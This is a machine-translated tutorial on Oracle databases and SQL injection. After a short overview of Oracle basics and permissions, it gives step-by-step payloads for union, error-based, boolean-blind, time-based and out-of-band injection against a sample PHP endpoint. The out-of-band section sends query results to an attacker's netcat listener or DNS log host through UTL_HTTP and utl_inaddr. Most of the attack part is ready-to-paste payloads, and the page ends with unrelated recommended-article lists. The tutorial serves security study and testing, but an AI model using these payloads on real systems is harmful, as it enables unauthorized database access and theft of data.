0x00 Oracle Basics

Oracle Basic use

What is? Oracle database ?

  • Oracle The company is currently one of the largest software providers in the world , Alongside it are Microsoft And Adode. And with Oracle The development of , It has become one of the largest software providers of enterprise office platform .

  • Oracle The database is Oracle ( The Chinese name is Oracle ) The company's core products ,Oracle The database is — A database management system suitable for large and medium-sized enterprises . In all database management systems ( such as : Microsoft SQL Server,IBM Of DB2 etc. ), Oracle Its main users cover a wide range, including banks 、 telecom 、 mobile communication 、 aviation 、 insurance 、 Finance 、 E-commerce and multinational corporations . Oracle The product is free , Can be in Oracle Download the installation package from the official website , On the other hand Oracle The service is charged .

  • The website links :https://www.oracle.com/cn/index.html

Oracle The characteristics of database

  • Complete data management function

  • The amount of data

  • Preservation and persistence of data

  • Database sharing

  • Products with complete relationships

  • Information rules --- Relational type DBMS All the information is logically in one way , That is, the values in the table explicitly represent

  • Criteria for ensuring access

  • View update criteria --- As long as the data in the table forming the view changes , The data in the corresponding view changes at the same time

  • Complete data management function

  • Distributed processing function

  • One ORACLE Distributed database consists of oraclerdbms、sq|Net、 SQLCONNECT And other non ORACLE The composition of relational products

Compared to other databases Oracle Advantages and disadvantages

  • advantage

  • open :Oracle Can run on all mainstream platforms ( Include windows) Fully support all industry standards, adopt a fully open strategy to enable customers to choose suitable solutions, and fully support developers

  • Parallelism :Oracle Parallel server is extended by making group nodes share the same cluster work windowNT Ability to provide cluster solutions with high usability and high scalability

  • Security : Get the highest level of certification ISO Standard certification .

  • performance :Oracle High performance, keep under the open platform TPC-D and TPC-C World Records

  • Use risk :Oracle Long time development experience is fully compatible with low risk of wide application

  • shortcoming

  • Higher requirements for hardware

  • It's more expensive

  • Management and maintenance are troublesome

  • The operation is more complicated , It needs high technology

Oracle Common data types

Sign in Oracle database

Oracle Database basic table management statement

 Create table 
create table Table name ( Field name type constraint )
create table ichunqiu(name char(10) primary key,age int) Add column
alter table Table name add( Field name , data type )
alter table ichunqiu add(class_name varchar2(200)) Delete a column in the table
alter table Table name set unused column Name
alter table ichunqiu set unused column name Modify table fields
alter table Table name modify( Field name New field type )
alter table ichunqiu modify(name varchar(200))

** Oracle Database basic data operation statement **

** Inquire about **
select *| Name | expression from Table name where Conditions order by Name
select * from ichunqiu order by age desc ( Descending )
select * from ichunqiu order by age asc ( Ascending )
select * from ichunqiu order by age ( The default is ascending ) ** Insert **
insert into Table name values( Corresponding values of all fields )
insert into Table name ( Field name 1, Field name 2, Field name 3,...)values( Field corresponding value )
insert into ichunqiu(name,age) values('icq',18)
insert into ichunqiu values('icq',18,'web') ** to update **
update Table name set Field name = value where Update conditions
update ichunqiu set age=25 where name='icq' ** Delete **
delete Table name where Conditions
delete ichunqiu where name='ii'
  • Truncate

  • grammar :truncate table Table name

  • explain : Delete the data in the table at one time

  • Truncate and delete difference

  1. truncate yes DDL command , Deleted data cannot be recovered ; delete yes DML command , The deleted data can be recovered through the log file of the database

  2. If there are many records in a table , truncate relative delete Fast

Oracle Access control

Oracle Summary of permissions

  • Permissions allow users to access objects or execute programs belonging to other users ,ORACLE The system provides three kinds of permissions : Object Object level 、 System The system level 、Role Role level . These permissions can be granted to users 、 Special users public Or the role , If you grant a permission to a special user "Public" ( user public yes oracle Predefined , Each user has the rights that this user has ) Granted all the permissions to the database .

  • For administrative rights , A character is a tool , Permission can be granted to — A character , A role can also be granted to another role or user . Users can inherit permissions through roles , Role services have no other purpose than administrative rights . Permissions can be granted , You can undo it in the same way

Authority classification

  • Oracle There are two types of permissions in the database
  1. System permissions : The system stipulates the user's right to use the database .( System permissions are for users )

  2. Entity permissions : The access rights of a user to other users' tables or views .( For a table or view )

System permissions ( User authority management )

  • System authority classification

  • DBA: Have all the privileges , It's the highest authority of the system , Only DBA To create a database structure

  • RESOURCE: Have Resource Users with permissions can only create entities , You can't create a database structure

  • CONNECT: Have Connect Users with permissions can only log in Oracle, You cannot create entities , You can't create a database structure

  • For ordinary users : grant connect, resource jurisdiction

  • about DBA Manage users : grant connect, resource,dba jurisdiction

System authority authorization command

  • System permissions can only be created by DBA Users give :sys, system( At the beginning, only these two users )
SQL> grant connect,resource,dba to user name 1[, user name 2]...;

SQL> Create user user50 identified by user50;
SQL> grant connect,resource to user50;

notes : Ordinary users can be authorized to have and system Same user rights , But not with sys Users have the same permissions , system User permissions can also be reclaimed .

Entity permissions ( Table permission management )

  • Entity permission classification

  • select, update, insert, alter, index, delete,all //all Including all permissions

  • execute // Execute stored procedure permissions

  • give an example :

grant select,insert, update on tablename to userA;            -- Empower the user : userA
grant select, insert, update on tablename to public: -- Empower all users
grant select, update on product to userA with grant option; --userA Get access to , And can pass on
revoke select insert, update on tablename from userA; -- Revoke the given permission from the user
userA revoke select, insert, update on tablename from public; -- Revoke the permissions granted from all users

Be careful : If you cancel the object permission of a user , So for this user, use WITH GRANT OPTION For the user who grants permission , The same permissions will also be removed from these users , That is to say, when the authorization is cancelled, it will be cascaded .

0x01 Common injection types

Introduce knowledge

  • Oracle Medium dual Table introduction

  • This watch is Oracle One of the databases Self contained Watch , It is to satisfy Query criteria And produce

  • dual Features of the watch

  1. dual yes oracle Pseudo table in ( Only one row and one column )

  2. Every user can use

  3. Probably dual The table was deleted ,sys Can recover

  • stay oracle The query statement used in must be followed by a table name , as follows :

  • Mysql:union select 1, 2, 3

  • Oracle:union select 1, 2, 3 from dual

  • Oracle Introduction to the annotation of

  • The single line comment symbol is :--

  • Multiline comment symbols are ://**

  • Oracle Of Strong matching type

  • stay Oracle Carry out similar UNION When querying data, the data type at the corresponding position must be consistent with the data type of the column in the table , You can also use null Instead of some locations where data types cannot be guessed quickly

  • give an example :

  • mysql::union select 1, 2, 3

  • oracle:union select null, null, null from dual

union Joint query injection

Oracle union The basic process of joint query injection

**1. Determine whether there is injection **
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1' **2. Determine the number of fields **
The current watch has 4 A field
id=1 order by 4-- **3. Joint query to retrieve the display **
Oracle Database query needs from dual ( Virtual table / False watch ) A table set specifically for query statements
union select * from dual--
id=1 union select 1,2,3,4 from dual--
null Replace all types
id=1 union select null,null,null,null from dual--
id=1 union select 1,'admin',3,4 from dual-- **4. Query database version 、 Database connection user 、 The current instance name **
id=1 union select 1,(select banner from sys.v_$version where rownum=1),3,4 from dual--
id=1 union select 1,(select SYS_CONTEXT('USERENV','CURRENT_USER') from dual),3,4 from dual-- #test
id=-1 union select 1,(select instance_name from v$instance),3,4 from dual-- **5. Traverse the database name **
id=-1 union select 1,(select owner from all_tables where rownum=1),3,4 from DUAL--
id=-1 union select 1,(select owner from all_tables where rownum=1 and owner not in ('SYS')),3,4 from DUAL--
id=-1 union select 1,(select owner from all_tables where rownum=1 and owner not in('SYS','OUTLN','SYSTEM')),3,4 from DUAL-- **6. Traversal table name **
id=-1 union select 1,(select table_name from user_tables where rownum=1 and table_name not in ('ADMIN1','DEMO','FLAG','ICHUNQIU','STU')),3,4 from DUAL-- **7. Traverse flag Table field name **
id=-1 union select 1,(select column_name from user_tab_columns where rownum=1 and table_name='FLAG' AND column_name not in ('id','name','pwd','flag')),3,4 from DUAL-- **8. Query table field data **
id=-1 union select 1,(select NAME||AGE FROM DEMO where rownum=1),3,4 from dual--
id=-1 union select 1,(select "name"||"age" FROM DEMO where rownum=1),3,4 from dual--
id=-1 union select 1,(select 'username:'||NAME||'age:'||AGE FROM DEMO where rownum=1),3,4 from dual--

error Inject

Common error display functions

  1. dbms_xdb_version.checkin() function
  • Belong to dbms_xdb_version Under the checkin function . This function checks in and out VCR And return the newly created version of the resource ID.

  • payload:

and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null--
  1. dbms_xdb_version.uncheckout() function
  • Usage and checkin Agreement

  • payload:

and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null--
  1. **utl_inaddr.get_host_name() ** function
  • explain : This method Oracle 8g,9g,10g No permissions are required in , But in ** Oracle 11g And later ** , Officials have strengthened access control , So in 11g This method will be used for error injection in the future , The current database user must have Network access

  • Error reporting method : obtain ip Address , If its parameters cannot be parsed, an error will be reported , Displays the parameters passed . If its parameter is a SQL sentence , Then the error report will show the result .

  • payload:

and utl_inaddr.get_host_name((select user from dual))=1--

Other commonly used error display functions

Function name payload
dbms_xdb_version.makeversioned() and (select dbms_xdb_version.makeversioned ((select user from dual)) from dual) is not null--
dbms_utility.sqlid_to_sqlhash() and (select dbms_utility.sqlid_to_sqlhash ((select user from dual)) from dual) is not null--
ordsys.ord_dicom.getmappingxpath() and select ordsys.ord_dicom.getmappingxpath ((select user from dual),user,user) =1--
ctxsys.drithsx.sn() and (select ctxsys.drithsx.sn ((select user from dual)) from dual) =1--

Oracle error Injection basic process

**1. Determine whether there is injection **
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1' 2.** Query database version 、 Database connection user 、 The current instance name **
id=1 and dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select SYS_CONTEXT('USERENV','CURRENT_USER') from dual)) is not null--
id=1 and dbms_xdb_version.checkin((select instance_name from v$instance)) is not null-- 2.** Traverse to get the database name **
id=1 and dbms_xdb_version.checkin((select owner from all_tables where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select owner from all_tables where rownum=1 and owner not in ('SYS'))) is not null-- 3.** Traverse to get the table name **
id=1 and dbms_xdb_version.checkin((select table_name from user_tables where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select table_name from user_tables where rownum=1 and table_name not in ('ADMIN1','DEMO'))) is not null-- **4. Traverse to get the field name **
id=1 and dbms_xdb_version.checkin((select column_name from user_tab_columns where rownum=1 and table_name='FLAG' AND column_name not in ('id','name','pwd','flag'))) is not null-- 5.** Query table field data **
id=1 and dbms_xdb_version.checkin((select NAME||AGE FROM DEMO where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select "name"||"age" FROM DEMO where rownum=1)) is not null--
id=1 and dbms_xdb_version.checkin((select 'username:'||NAME||'age:'||AGE FROM DEMO where rownum=1)) is not null--

bool Blind note

bool Blind correlation function

  1. decode() ** function **
  • usage :decode( Conditions , value 1, Translation value 1, value 2, Translation value 2… value n, Translation value n, The default value )

  • meaning :if( Conditions == value 1) -> Returns the translation value 1, Otherwise, return the default value

  • give an example : Inquire about Oracle edition , Judge whether the first character of the version string is O

  • Payload :

and1=(select decode(substr((select banner from sys.v_$Version where rownum=1),1,1), 'O', 1, 0) from dual--
  • explain : among select Statements can replace , Such as :

  • Get the current user : selectuser from dual;

  • Get character length : select length(user) from dual;

  1. instr() ** function **
  • usage :instr( string1, string2 ) / instr( The source string , Target character )

  • meaning : Search for the specified character and return the position where the specified character is found , string1 Is the searched string , string2 Is the string you want to search

  • Injection idea : instr Returns the ’SQL’ The position of the location data in the query results , If not found, return 0, Can be based on ‘SQL′ Position traversal and iteration , Get data

  • give an example : Query the current user , Determine whether the first character of the user name is T

  • Payload

and1=(instr((select user from dual),'T'))--

Oracle bool Basic process of blind injection

**1. Judgment injection **
http://172.16.12.2:81/orcl.php?id=1' " and 1=1 and '1'='1' or '1'='1' 2.** Query database version / user **
decode decode(substr(('abc'),1,1),'a',1,0)
length Return string length
ascii Return character's ascii code
instr Whether the search results contain keywords There is returned 1 Otherwise return to 0
id=1 and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual)--
id=1 and (select length(user) from dual)=4--
id=1 and (select ascii('a') from dual)=97--
id=1 and (select ascii(substr((select user from dual),1,1)) from dual)=84-- #ascii Code judgment character T
id=1 and (select ascii(substr((select user from dual),2,1)) from dual)=69-- #ascii Code judgment character E id=1 and 1=(instr((select user from dual),'T'))--
id=1 and 1=(instr((select user from dual),'TE'))--
id=1 and 1=(instr((select user from dual),'TES'))--
id=1 and 1=(instr((select user from dual),'TEST'))-- **3. Get library name **
id=1 and (select length(owner) from all_tables where rownum=1)=3-- # The length of the first library name is 3
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),1,1)) from dual)=83--
#ascii by 83 S
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),2,1)) from dual)=89--
#ascii by 89 Y
id=1 and (select ascii(substr((select owner from all_tables where rownum=1),3,1)) from dual)=83--
#ascii by 83 S **4. Get table name **
id=1 and (select ascii(substr((select table_name from user_tables where rownum=1),1,1)) from dual)=105-- The first character of the first table name is i
id=1 and (select ascii(substr((select table_name from user_tables where rownum=1),2,1)) from dual)=99-- The second character of the first table name is c **5. Get field name **
id=1 and (select ascii(substr((select column_name from user_tab_columns where rownum=1 and table_name='icq'),1,1)) from dual)=117-- icq The first character of the first field in the table u
id=1 and (select ascii(substr((select column_name from user_tab_columns where rownum=1 and table_name='icq'),2,1)) from dual)=115-- icq The second character of the first field in the table s

time Blind note

time Blind correlation function

  • DBMS_PIPE.RECEIVE_MESSAGE() ** function **

  • usage :DBMS_PIPE.RECEIVE_MESSAGE(' Any value ', Delay time )

  • give an example :DBMS_PIPE.RECEIVE_MESSAGE('ICQ',5) From ICQ The data returned by the pipeline needs to wait 5 second

  • payload

and DBMS_PIPE.RECEIVE_MESSAGE('ICQ',5)=1

Commonly used payload

id=1 and dbms_pipe.receive_message((), 5)=1
id=1 and (select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O', dbms_pipe.receive_message('ICQ', 5),0) from dual)=1--
The first character of the intercepted database version is O Just delay 5s
id=1 and (select decode(length(user),4,dbms_pipe.receive_message('ICQ', 5),0) from dual)=1--
The length of the user name is 4 Just delay 5s

Out of band injection

Oracle Out of band injection

  • Oracle Out of band injection and DNSLOG Very similar , need Functions that use network requests Injection and utilization , The functions that can make network requests are as follows

Out of band injection correlation function

  • utl_http.request() ** function **

  • Function description : stay Oracle Provided in utlhttprequest function , Used to obtain web Server request information , therefore , An attacker can listen on the port itself , Then send the required data with a request through this function

  • UTL_HTTP Package introduction : Provide for the right to HTTP Some operations of .

  • give an example : Implement this SQL sentence , Will return baidu. com Of HTML Source code

select UTL_HTTP.REQUEST('http://www.baidu.com') from dual
  • utl_inaddr.get_host_address() function

  • Commonly used payload

and (selectutl_inaddr.get_host_address((select user from dual)||'.aaa.com( Build yourself dnslog)') from dual)is not null --
  • SYS.DBMS_LDAP.INIT()

  • Commonly used payload

and (select SYS.DBMS_LDAP.INIT((select userfrom dual)||'.aaaa.com( Build yourself dnslog)') from dual)is notnull --

Out of band injection process

  1. Judge UTL_HTTP Whether the stored procedure is available
  • Submit the following query at the injection point :
select count(*) from allobjects where object name='UTL_HTTP'
  • Judge by page echo UTL_HTTP Is it available , If the page returns to normal , shows UTL_HTTP Stored procedures are available
  1. Use NC Monitor data
  • For local use nc Listening on a port , The local host is required to have an external network ip Address

  • nc-lvvp Listening port

  1. Bounce data information
  • Submit at the injection point :
and UTL_HTTP.request('http://ip: Listening port /'||( Query statement )=1--

Injection attack can be realized

Be careful : Submit a request at the injection point every time ,nc After listening, it will disconnect , Reboot required nc monitor

Commonly used payload

#  Judge utl_http Is it available 
id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP')--
id=1 and (select count(*) from all_objects where object_name='UTL_HTTP')>1--
id=1 union select 1,null,3,(select count(*) from all_objects where object_name='UTL_HTTP') from dual-- # Send a request , Get current user name
id=1 and UTL_HTTP.request('http://ip: Listening port /'||(select user from dual)=1--

Oracle SQL Inject Summarize more related articles

  1. Web Penetration test (sql Inject access,mssql,mysql,oracle,)

    Access Database Injection : access Database is a relational database released by Microsoft ( Miniature ), Poor safety . access Database suffix *.mdb, asp Application of connection string in -- "Driver={micros ...

  2. sql It's a tough detour - Three layers of protection (oracle)

    open :www.xxxx.com/news/detail.jsp?id=2862 We've tested it and we know it contains sql Inject . Let's try : http://www.xxxxxx.com/news/detail.j ...

  3. Loopholes in the official website of a branch of China Meteorological Administration ( Weak password +SQL Inject +padding oracle)

    Loophole I . Weak background password Backstage address :http://www.hnmatc.org/admin/ Direct blasting to get the account number admin   password admin888 Loophole two .SQL Inject ( There are both front and back ) Injection point :http://w ...

  4. Oracle Learning summary (6)—— SQL Injection technology

    No matter what language it's written in Web application , They all have one thing in common , Interactive and mostly database driven . In the network , Database driven Web Applications are everywhere , So there is SQL One of the most disruptive operational vulnerabilities in the business . SQL Injected base ...

  5. 15、 ... and :SQL Injected oracle,Mangodb Inject

    Access,Mysql,mssql,mangoDB,postgresql,sqlite,oracle,sybase JSON Type of data injection : Key name : Key value {"a":"1 ...

  6. In depth understanding of SQL Injection bypass WAF And filtering mechanism

    Enemy and know yourself , you can fight a hundred battles with no danger of defeat -- Sun Tzu's art of war [ Catalog ] 0x0 Preface 0x1 WAF Common features of 0x2 Bypass WAF Methods 0x3 SQLi Filter And Evasion 0x4 Examples of extension and test vectors 0x5 ...

  7. prevent sql Injection and sqlmap Introduce

    sql The injection problem starts with WEB It has never stopped since it was born , Companies of all sizes have appeared sql Injection problem , It leads to being dragged into the library , Then there are a series of influences, such as the impact of social workers' bank on the bank . prevent sql The most important thing to inject personal understanding is , That is, all variables are parameterized , Can fundamentally solve ...

  8. SQL Introduction to injection attack and defense

    ============= Security content ============== This article is reprinted. Graduated and began to engage in winfrm Go to this year  web , It's been a long time in the world of Agriculture 3 Years. , But knowledge of security is still weak , In fact, there is no opportunity ...

  9. defense sql Inject

    1. Domain Driven security Domain Driven security is a method of code design . The idea is to transform an implicit concept into a display , I think that is the object-oriented method , Abstract a concept into a class , In this class, the properties of the class are constrained by methods . Whether it's a string , What words are included ...

  10. senior sql Inject

    1. Avoid input filtering Input filtering exists both externally and internally , External belonging web Application firewall WAF, Intrusion prevention system IPS, intrusion detection system IDS, The internal code filters the input Filter select,insert etc. sql Key words and ' | ...

Random recommendation

  1. Different versions jq The question of conflict

    I found a few on the Internet qq Customer service js Code , There is no problem with local debugging. As soon as it is added to the website, there are problems, and all kinds of errors . The final discovery is jq The problem of , There are different websites jq The conflict , resolvent : <script>var $j = jQuery ...

  2. [POJ2586]Y2K Accounting Bug

    [POJ2586]Y2K Accounting Bug Test description Accounting for Computer Machinists (ACM) has sufferred from the Y2K ...

  3. angular Of post request ,SpringMVC The background cannot receive the solution of parameter value

    http://www.ithao123.cn/content-6567265.html

  4. 【 Network flow 24 topic 】No. 20 Deep sea robot problem ( Cost stream )

    [ The question ] The submarine of the deep-sea resources exploration team will arrive at the deep-sea seabed for scientific investigation . There are many deep-sea robots in the submarine . When the submarine reaches the deep seabed , The deep-sea robot will leave the submarine and move towards the predetermined target . The deep-sea robot must also collect seabed biological samples along the way . Along the ...

  5. 137 Single Number II( Find a unique number Medium)

    The title mean : One int Array , There is a number that appears only once , The other numbers appear three times , Find this unique number Ideas : 1. Put all the numbers in 2 Hexadecimal said , Calculate the number of each digit and  1*3*n1+0*3*n2+c   The unique number corresponds to the number of bits (0 perhaps 1 ...

  6. Remoting Interface testing tool

    Write one by hand Remoting Interface testing tool be based on .NET Developing distributed systems , Frequently used Remoting technology . Today, test driven development is popular , If for each of the distributed systems Remoting Each method of the interface needs to write a detailed test script ...

  7. springmvc To upload pictures , Send E-mail

    package hcxAction; import hcxMode.Advertises; import hcxMode.Areas; import hcxMode.Saveresume; impor ...

  8. The C++ Programming Language Learning notes The first 5 Chapter The pointer 、 Arrays and structures

    1. About outputting the value of a pointer to a character . Now define ,char c='a',char* pc=&c. stay C in , To output this value, you only need printf("%p\n",pc); And in the C++ in , If cou ...

  9. GTK Subject black border problem

    Linux this is it , Something strange happened upstream , Downstream processes will be affected .. After rolling recently , I do not know! mesa still xf86-intel-video Who played something new , all gtk application [ Mainly gnome Components ] Bring it all with you ...

  10. Mobile ,input Input box is the solution of mobile phone input method

    When the interface elements are down ,input The input box will be blocked by the system keyboard . We can move the interface up a certain distance to avoid occlusion . $('#money').click(function(){ setTimeout(funct ...